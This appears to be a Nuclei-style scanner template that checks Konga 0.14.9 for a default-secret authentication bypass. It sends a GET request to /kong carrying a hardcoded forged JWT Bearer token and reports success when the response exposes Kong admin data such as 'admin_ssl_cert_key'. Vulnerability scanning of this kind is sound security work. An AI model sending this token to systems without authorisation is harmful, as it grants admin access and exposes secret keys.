id: Konga-default-login

info:
  name: Konga 0.14.9 版本默认口令漏洞
  author: Str1am
  severity: high
  reference: https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/Token.js
  tags: Konga,login

requests:
  - raw:
      - |
        GET /kong HTTP/1.1
        Host: {{Hostname}}
        authorization: Bearer eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "hostname"
          - "version"
          - "admin_ssl_cert_key"
        part: body
        condition: and